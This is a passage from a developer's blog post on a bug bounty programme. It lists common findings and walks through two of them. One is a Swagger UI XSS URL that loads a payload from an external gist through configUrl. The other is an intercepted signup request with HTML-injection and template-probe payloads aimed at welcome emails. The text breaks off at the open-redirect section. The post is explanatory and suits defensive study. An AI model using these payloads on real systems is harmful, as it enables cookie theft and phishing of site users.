tag:blogger.com,1999:blog-65239419020022894782024-03-19T14:18:44.884+05:30Ramkumar Krishnana blog on programming, design, debugging, unlearning, re-learning, chaotic day & uninhabited nights in office ;-) <br><br>
<small>Follow me in medium at : <a href="https://medium.com/@ramkrivas">https://medium.com/@ramkrivas</a></small>Ramkumar Krishnanhttp://www.blogger.com/profile/07593862251269402877noreply@blogger.comBlogger35125tag:blogger.com,1999:blog-6523941902002289478.post-10425228523859715442023-07-27T14:56:00.006+05:302023-07-27T14:56:58.606+05:30Bug bounty program experience — Tips and Tricks<p><span style="background-color: white; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em;"><span style="font-size: medium;">I recently involved in the bug bounty program and sharing here the experiences of working with ethical hackers from hackerone.com communities. In this article let us see some of the common findings from hackers, how to reproduce it, understanding the program workflow and also assessing the findings based CVSS severity matrix.</span></span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="0193" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">Let us start with understanding how a bug bounty program works.</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="0de2" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">Hackerone offers different type of bug bounty programs, it can be either a fully-managed program or a self managed program. Here is how a fully-managed bug bounty program workflow would be and the preparation to it.</span></p><h2 class="ti tj oa be tk tl tm tn to tp tq tr ts sv tt tu tv sz tw tx ty td tz ua ub uc bj" data-selectable-paragraph="" id="6966" style="background-color: white; box-sizing: inherit; color: #242424; font-family: sohne, "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 20px; line-height: 24px; margin: 1.72em 0px -0.31em;">Prerequisites :</h2><ol class="" style="background-color: white; box-sizing: inherit; color: rgba(0, 0, 0, 0.8); font-family: medium-content-sans-serif-font, -apple-system, "system-ui", "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif; list-style: none none; margin: 0px; padding: 0px;"><li class="sk sl oa sm b sn ud sp sq sr ue st su uf ug sx sy uh ui tb tc uj uk tf tg th ul um un bj" data-selectable-paragraph="" id="41b6" style="box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; list-style-type: decimal; margin-bottom: -0.46em; margin-left: 30px; margin-top: 0.86em; padding-left: 0px;"><span style="font-size: medium;">Know your type of assets ( Tier 1, Tier 2…etc)</span></li><li class="sk sl oa sm b sn uo sp sq sr up st su uf uq sx sy uh ur tb tc uj us tf tg th ul um un bj" data-selectable-paragraph="" id="3e52" style="box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; list-style-type: decimal; margin-bottom: -0.46em; margin-left: 30px; margin-top: 1.05em; padding-left: 0px;"><span style="font-size: medium;">Know your reward amount for each tier</span></li><li class="sk sl oa sm b sn uo sp sq sr up st su uf uq sx sy uh ur tb tc uj us tf tg th ul um un bj" data-selectable-paragraph="" id="a111" style="box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; list-style-type: decimal; margin-bottom: -0.46em; margin-left: 30px; margin-top: 1.05em; padding-left: 0px;"><span style="font-size: medium;">Loyalty bonus details ( if any )</span></li><li class="sk sl oa sm b sn uo sp sq sr up st su uf uq sx sy uh ur tb tc uj us tf tg th ul um un bj" data-selectable-paragraph="" id="a4d8" style="box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; list-style-type: decimal; margin-bottom: -0.46em; margin-left: 30px; margin-top: 1.05em; padding-left: 0px;"><span style="font-size: medium;">Clear documentation on application testing scope</span></li><li class="sk sl oa sm b sn uo sp sq sr up st su uf uq sx sy uh ur tb tc uj us tf tg th ul um un bj" data-selectable-paragraph="" id="4998" style="box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; list-style-type: decimal; margin-bottom: -0.46em; margin-left: 30px; margin-top: 1.05em; padding-left: 0px;"><span style="font-size: medium;">Technical informations for hackers such as API Swagger specifications, interface details, etc.,</span></li><li class="sk sl oa sm b sn uo sp sq sr up st su uf uq sx sy uh ur tb tc uj us tf tg th ul um un bj" data-selectable-paragraph="" id="42c3" style="box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; list-style-type: decimal; margin-bottom: -0.46em; margin-left: 30px; margin-top: 1.05em; padding-left: 0px;"><span style="font-size: medium;">Clear documentation on your trust boundaries (network and machine).</span></li></ol><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="0dc3" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">Once the above preparations are done and your application is on-boarded to the program, then the hacker reporting workflow would be as like below</span></p><figure class="uw ux uy uz va vb ut uu paragraph-image" style="background-color: white; box-sizing: inherit; clear: both; color: rgba(0, 0, 0, 0.8); font-family: medium-content-sans-serif-font, -apple-system, "system-ui", "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif; margin: 56px auto 0px;"><div class="vc vd dj ve bg vf" role="button" style="box-sizing: inherit; cursor: zoom-in; position: relative; transition: transform 300ms cubic-bezier(0.2, 0, 0.2, 1) 0s; width: 680px; z-index: auto;" tabindex="0"><div class="ut uu uv" style="box-sizing: inherit; margin-left: auto; margin-right: auto; max-width: 2356px;"><picture style="box-sizing: inherit;"><source sizes="(min-resolution: 4dppx) and (max-width: 700px) 50vw, (-webkit-min-device-pixel-ratio: 4) and (max-width: 700px) 50vw, (min-resolution: 3dppx) and (max-width: 700px) 67vw, (-webkit-min-device-pixel-ratio: 3) and (max-width: 700px) 65vw, (min-resolution: 2.5dppx) and (max-width: 700px) 80vw, (-webkit-min-device-pixel-ratio: 2.5) and (max-width: 700px) 80vw, (min-resolution: 2dppx) and (max-width: 700px) 100vw, (-webkit-min-device-pixel-ratio: 2) and (max-width: 700px) 100vw, 700px" srcset="https://miro.medium.com/v2/resize:fit:640/format:webp/1*4uLTr9wImcleXQxok7grjQ.png 640w, https://miro.medium.com/v2/resize:fit:720/format:webp/1*4uLTr9wImcleXQxok7grjQ.png 720w, https://miro.medium.com/v2/resize:fit:750/format:webp/1*4uLTr9wImcleXQxok7grjQ.png 750w, https://miro.medium.com/v2/resize:fit:786/format:webp/1*4uLTr9wImcleXQxok7grjQ.png 786w, https://miro.medium.com/v2/resize:fit:828/format:webp/1*4uLTr9wImcleXQxok7grjQ.png 828w, https://miro.medium.com/v2/resize:fit:1100/format:webp/1*4uLTr9wImcleXQxok7grjQ.png 1100w, https://miro.medium.com/v2/resize:fit:1400/format:webp/1*4uLTr9wImcleXQxok7grjQ.png 1400w" style="box-sizing: inherit;" type="image/webp"></source><source data-testid="og" sizes="(min-resolution: 4dppx) and (max-width: 700px) 50vw, (-webkit-min-device-pixel-ratio: 4) and (max-width: 700px) 50vw, (min-resolution: 3dppx) and (max-width: 700px) 67vw, (-webkit-min-device-pixel-ratio: 3) and (max-width: 700px) 65vw, (min-resolution: 2.5dppx) and (max-width: 700px) 80vw, (-webkit-min-device-pixel-ratio: 2.5) and (max-width: 700px) 80vw, (min-resolution: 2dppx) and (max-width: 700px) 100vw, (-webkit-min-device-pixel-ratio: 2) and (max-width: 700px) 100vw, 700px" srcset="https://miro.medium.com/v2/resize:fit:640/1*4uLTr9wImcleXQxok7grjQ.png 640w, https://miro.medium.com/v2/resize:fit:720/1*4uLTr9wImcleXQxok7grjQ.png 720w, https://miro.medium.com/v2/resize:fit:750/1*4uLTr9wImcleXQxok7grjQ.png 750w, https://miro.medium.com/v2/resize:fit:786/1*4uLTr9wImcleXQxok7grjQ.png 786w, https://miro.medium.com/v2/resize:fit:828/1*4uLTr9wImcleXQxok7grjQ.png 828w, https://miro.medium.com/v2/resize:fit:1100/1*4uLTr9wImcleXQxok7grjQ.png 1100w, https://miro.medium.com/v2/resize:fit:1400/1*4uLTr9wImcleXQxok7grjQ.png 1400w" style="box-sizing: inherit;"></source><img alt="" class="bg vg vh c" height="173" loading="lazy" role="presentation" src="https://miro.medium.com/v2/resize:fit:1400/1*4uLTr9wImcleXQxok7grjQ.png" style="box-sizing: inherit; height: auto; max-width: 100%; vertical-align: middle; width: 680px;" width="700" /></picture></div></div><figcaption class="vi vj vk ut uu vl vm be b bf z dn" data-selectable-paragraph="" style="box-sizing: inherit; color: #6b6b6b; font-family: sohne, "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 14px; line-height: 20px; margin-left: auto; margin-right: auto; margin-top: 10px; max-width: 728px; text-align: center;">How a fully-managed bug bounty program works</figcaption></figure><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="590e" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">I believe, now you have some basic understanding of bug bounty programs.</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="bfbb" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">Let us now discuss on some of the common findings I came across during the bug bounty programs.</span></p><ul class="" style="background-color: white; box-sizing: inherit; color: rgba(0, 0, 0, 0.8); font-family: medium-content-sans-serif-font, -apple-system, "system-ui", "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif; list-style: none none; margin: 0px; padding: 0px;"><li class="sk sl oa sm b sn so sp sq sr ss st su uf sw sx sy uh ta tb tc uj te tf tg th vn um un bj" data-selectable-paragraph="" id="e3a2" style="box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; list-style-type: disc; margin-bottom: -0.46em; margin-left: 30px; margin-top: 2em; padding-left: 0px;"><span style="font-size: medium;">Reflected XSS in Swagger UI — DOMPurify component</span></li><li class="sk sl oa sm b sn uo sp sq sr up st su uf uq sx sy uh ur tb tc uj us tf tg th vn um un bj" data-selectable-paragraph="" id="482f" style="box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; list-style-type: disc; margin-bottom: -0.46em; margin-left: 30px; margin-top: 1.05em; padding-left: 0px;"><span style="font-size: medium;">HTML Injections in Email Templates</span></li><li class="sk sl oa sm b sn uo sp sq sr up st su uf uq sx sy uh ur tb tc uj us tf tg th vn um un bj" data-selectable-paragraph="" id="2349" style="box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; list-style-type: disc; margin-bottom: -0.46em; margin-left: 30px; margin-top: 1.05em; padding-left: 0px;"><span style="font-size: medium;">Open redirect attack — token exchange auth flow</span></li><li class="sk sl oa sm b sn uo sp sq sr up st su uf uq sx sy uh ur tb tc uj us tf tg th vn um un bj" data-selectable-paragraph="" id="cdcb" style="box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; list-style-type: disc; margin-bottom: -0.46em; margin-left: 30px; margin-top: 1.05em; padding-left: 0px;"><span style="font-size: medium;">SQL injection attack on the application tables</span></li><li class="sk sl oa sm b sn uo sp sq sr up st su uf uq sx sy uh ur tb tc uj us tf tg th vn um un bj" data-selectable-paragraph="" id="9213" style="box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; list-style-type: disc; margin-bottom: -0.46em; margin-left: 30px; margin-top: 1.05em; padding-left: 0px;"><span style="font-size: medium;">Path traversal attack on admin directories</span></li><li class="sk sl oa sm b sn uo sp sq sr up st su uf uq sx sy uh ur tb tc uj us tf tg th vn um un bj" data-selectable-paragraph="" id="c111" style="box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; list-style-type: disc; margin-bottom: -0.46em; margin-left: 30px; margin-top: 1.05em; padding-left: 0px;"><span style="font-size: medium;">IDOR attack — Chat box conversation scenario</span></li><li class="sk sl oa sm b sn uo sp sq sr up st su uf uq sx sy uh ur tb tc uj us tf tg th vn um un bj" data-selectable-paragraph="" id="62ff" style="box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; list-style-type: disc; margin-bottom: -0.46em; margin-left: 30px; margin-top: 1.05em; padding-left: 0px;"><span style="font-size: medium;">DOM XSS with Cookie Bomb attack</span></li><li class="sk sl oa sm b sn uo sp sq sr up st su uf uq sx sy uh ur tb tc uj us tf tg th vn um un bj" data-selectable-paragraph="" id="19a0" style="box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; list-style-type: disc; margin-bottom: -0.46em; margin-left: 30px; margin-top: 1.05em; padding-left: 0px;"><span style="font-size: medium;">Unauthenticated access to databases</span></li><li class="sk sl oa sm b sn uo sp sq sr up st su uf uq sx sy uh ur tb tc uj us tf tg th vn um un bj" data-selectable-paragraph="" id="c3b7" style="box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; list-style-type: disc; margin-bottom: -0.46em; margin-left: 30px; margin-top: 1.05em; padding-left: 0px;"><span style="font-size: medium;">Reflected XSS — user authentication flow</span></li><li class="sk sl oa sm b sn uo sp sq sr up st su uf uq sx sy uh ur tb tc uj us tf tg th vn um un bj" data-selectable-paragraph="" id="747c" style="box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; list-style-type: disc; margin-bottom: -0.46em; margin-left: 30px; margin-top: 1.05em; padding-left: 0px;"><span style="font-size: medium;">Bruteforce attack — by passing rate limit with IP Rotation</span></li></ul><h2 class="ti tj oa be tk tl tm tn to tp tq tr ts sv tt tu tv sz tw tx ty td tz ua ub uc bj" data-selectable-paragraph="" id="206d" style="background-color: white; box-sizing: inherit; color: #242424; font-family: sohne, "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 20px; line-height: 24px; margin: 1.72em 0px -0.31em;">Reflected XSS in Swagger UI — DOMPurify component</h2><p class="pw-post-body-paragraph sk sl oa sm b sn ud sp sq sr ue st su sv ug sx sy sz ui tb tc td uk tf tg th nu bj" data-selectable-paragraph="" id="5493" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 0.86em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">I see this finding reported by many hackers. It is a low hanging fruit which everyone targets as a first in the Swagger UI. Mostly this finding would have low or medium impact on the product. but still it is easily exploitable and it can lead to injection attacks.</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="064b" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">How to exploit :</span></p><ol class="" style="background-color: white; box-sizing: inherit; color: rgba(0, 0, 0, 0.8); font-family: medium-content-sans-serif-font, -apple-system, "system-ui", "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif; list-style: none none; margin: 0px; padding: 0px;"><li class="sk sl oa sm b sn so sp sq sr ss st su uf sw sx sy uh ta tb tc uj te tf tg th ul um un bj" data-selectable-paragraph="" id="2321" style="box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; list-style-type: decimal; margin-bottom: -0.46em; margin-left: 30px; margin-top: 2em; padding-left: 0px;"><span style="font-size: medium;">Craft a vulnerable XSS payload json as shown in the below snippet</span></li></ol><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="cc06" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><a class="af vo" href="https://gist.githubusercontent.com/ramkrivas/c47c4a49bea5f3ff99a9e6229298a6ba/raw/e2e610ea302541a37604c7df8bcaebdcb109b3ba/xsstest.json" rel="noopener ugc nofollow" style="-webkit-tap-highlight-color: transparent; box-sizing: inherit;" target="_blank">https://gist.githubusercontent.com/ramkrivas/c47c4a49bea5f3ff99a9e6229298a6ba/raw/e2e610ea302541a37604c7df8bcaebdcb109b3ba/xsstest.json</a></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="b580" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">2. Go to your Swagger UI path and add query param “configUrl” and pass the above snippet url.</span></p><pre class="uw ux uy uz va vp vq vr bo vs ba bj" style="background: rgb(249, 249, 249); border-radius: 4px; border: 1px solid rgb(229, 229, 229); box-sizing: inherit; color: #242424; font-family: source-code-pro, Menlo, Monaco, "Courier New", Courier, monospace; margin-bottom: 0px; margin-top: 56px; overflow-x: auto; padding: 32px;"><span class="vt tj oa vq b bf vu vv l vw vx" data-selectable-paragraph="" id="48e0" style="box-sizing: inherit; display: block; font-size: 14px; letter-spacing: -0.022em; line-height: 1.4; margin-bottom: -0.2em; margin-top: -0.2em; min-width: fit-content; text-wrap: wrap;">https://{{YOUR_DOMAIN}}/swagger/indext.html?configUrl=https://gist.githubusercontent.com/ramkrivas/c47c4a49bea5f3ff99a9e6229298a6ba/raw/e2e610ea302541a37604c7df8bcaebdcb109b3ba/xsstest.json</span></pre><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="4c3c" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">If your application Swagger UI is running with DOMPurify vulnerable version then the above XSS payload will be executed in your swagger UI application. That is it ! you are the one of victim.</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="555c" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">Impact:</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="7aa1" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">The injected script will be executed in your Swagger UI with help of DOMPurify vulnerability and it exposes informations such as your cookies or other sensitive informations from your browser context.</span></p><h2 class="ti tj oa be tk tl tm tn to tp tq tr ts sv tt tu tv sz tw tx ty td tz ua ub uc bj" data-selectable-paragraph="" id="04f9" style="background-color: white; box-sizing: inherit; color: #242424; font-family: sohne, "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 20px; line-height: 24px; margin: 1.72em 0px -0.31em;">HTML Injections in Email Templates</h2><p class="pw-post-body-paragraph sk sl oa sm b sn ud sp sq sr ue st su sv ug sx sy sz ui tb tc td uk tf tg th nu bj" data-selectable-paragraph="" id="ae1e" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 0.86em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">This could be one of the usual hacks, hackers would attempt if your applications are sending out emails based on user interactions. This hacks can happen due to inadequate sanitisation of user inputs.</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="4f33" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">How to exploit :</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="4f33" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="letter-spacing: -0.003em;"><span style="font-size: medium;">Here, I take an example of a user signup to your web application and on successful signup the application triggers a welcome email to the user. Here, hackers can do tricks to embed HTML injection into the welcome email. There can be multiple ways to inject it, some time the signup form user inputs are not sanitised and it accepts special characters then there is a possibility of html injection from the form and on the other scenario if we can intercept the form post then there is a possibility of injecting the html into it.</span></span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="18ae" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">Here is a sample payload of signup form submission interception and embedding the html injection.</span></p><pre class="uw ux uy uz va vp vq vr bo vs ba bj" style="background: rgb(249, 249, 249); border-radius: 4px; border: 1px solid rgb(229, 229, 229); box-sizing: inherit; color: #242424; font-family: source-code-pro, Menlo, Monaco, "Courier New", Courier, monospace; margin-bottom: 0px; margin-top: 56px; overflow-x: auto; padding: 32px;"><span class="vt tj oa vq b bf vu vv l vy vx" data-selectable-paragraph="" id="a3b3" style="box-sizing: inherit; display: block; font-size: 14px; letter-spacing: -0.022em; line-height: 1.4; margin-bottom: -0.2em; margin-top: -0.2em; min-width: fit-content;"> POST /dbconnections/signup HTTP/<span class="hljs-number" style="box-sizing: inherit; color: #1c00cf;">2</span><br style="box-sizing: inherit;" /> Host: yourdomain.com<br style="box-sizing: inherit;" /> Content-Type: application/json<br style="box-sizing: inherit;" /> Accept: *<span class="hljs-regexp" style="box-sizing: inherit; color: #0e0eff;">/*<br style="box-sizing: inherit;" /> Accept-Language: en-us<br style="box-sizing: inherit;" /> Accept-Encoding: gzip, deflate<br style="box-sizing: inherit;" /> Origin: https:/</span><span class="hljs-regexp" style="box-sizing: inherit; color: #0e0eff;">/auth.yourdomain.com<br style="box-sizing: inherit;" /> Content-Length: 628<br style="box-sizing: inherit;" /> User-Agent: Mozilla/</span><span class="hljs-number" style="box-sizing: inherit; color: #1c00cf;">5.0</span> (Macintosh; Intel Mac OS X <span class="hljs-number" style="box-sizing: inherit; color: #1c00cf;">10_14_6</span>) AppleWebKit/<span class="hljs-number" style="box-sizing: inherit; color: #1c00cf;">605.1</span>.<span class="hljs-number" style="box-sizing: inherit; color: #1c00cf;">15</span> (KHTML, like Gecko) Version/<span class="hljs-number" style="box-sizing: inherit; color: #1c00cf;">13.1</span>.<span class="hljs-number" style="box-sizing: inherit; color: #1c00cf;">1</span> Safari/<span class="hljs-number" style="box-sizing: inherit; color: #1c00cf;">605.1</span>.<span class="hljs-number" style="box-sizing: inherit; color: #1c00cf;">15</span><br style="box-sizing: inherit;" /><br style="box-sizing: inherit;" />{<span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">"email"</span>:<span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">"hacker123@gmail.com"</span>,<br style="box-sizing: inherit;" /><span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">"password"</span>:<span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">"hackers@123*"</span>,<br style="box-sizing: inherit;" /><span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">"user_metadata"</span>:{<span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">"given_name"</span>:<span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">"<s>John<span class="hljs-subst" style="box-sizing: inherit; color: black;">${{<span class="hljs-number" style="box-sizing: inherit; color: #1c00cf;">4</span>*<span class="hljs-number" style="box-sizing: inherit; color: #1c00cf;">4</span>}</span>}"</span>,<span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">"family_name"</span>:<span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">"Doe"</span>,<br style="box-sizing: inherit;" /><span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">"locale_code"</span>:<span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">"\"><s><h1>HEHEHAHAHA</h1><br>\"><a href=//google.com>"</span>,<br style="box-sizing: inherit;" /><span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">"LocaleId"</span>:<span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">"1"</span>}}</span></pre><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="d60f" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">normally UI doesn’t allow user to put special characters to name inputs. so, here the send form request is captured and changed the locale_code parameter to XSS payload <span class="sm jr" style="box-sizing: inherit; font-weight: 700;"><em class="vz" style="box-sizing: inherit;">\”><s><h1>your my lovable victim HEHEHEHA</h1><br>\”><a href=//google.com></em></span><em class="vz" style="box-sizing: inherit;"> </em>and waited for getting the activation emails, in few seconds the received email with HTML coded executed in the user context. It is also possible to inject anchor tag and do some complex attacks to victims over smtp server.</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="a3cb" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">Impact :</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="d365" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">The impact of this vulnerability can be significant, an attacker would take advantage of the trust users have in the platform in order to redirect them to fraudulent sites (phishing, etc.) or even push them to perform undesirable actions from their accounts. Programs generally consider the severity of this vulnerability between low and medium.</span></p><h2 class="ti tj oa be tk tl tm tn to tp tq tr ts sv tt tu tv sz tw tx ty td tz ua ub uc bj" data-selectable-paragraph="" id="9484" style="background-color: white; box-sizing: inherit; color: #242424; font-family: sohne, "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 20px; line-height: 24px; margin: 1.72em 0px -0.31em;">Open redirect attack — token exchange auth flow</h2><p class="pw-post-body-paragraph sk sl oa sm b sn ud sp sq sr ue st su sv ug sx sy sz ui tb tc td uk tf tg th nu bj" data-selectable-paragraph="" id="7fd1" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, 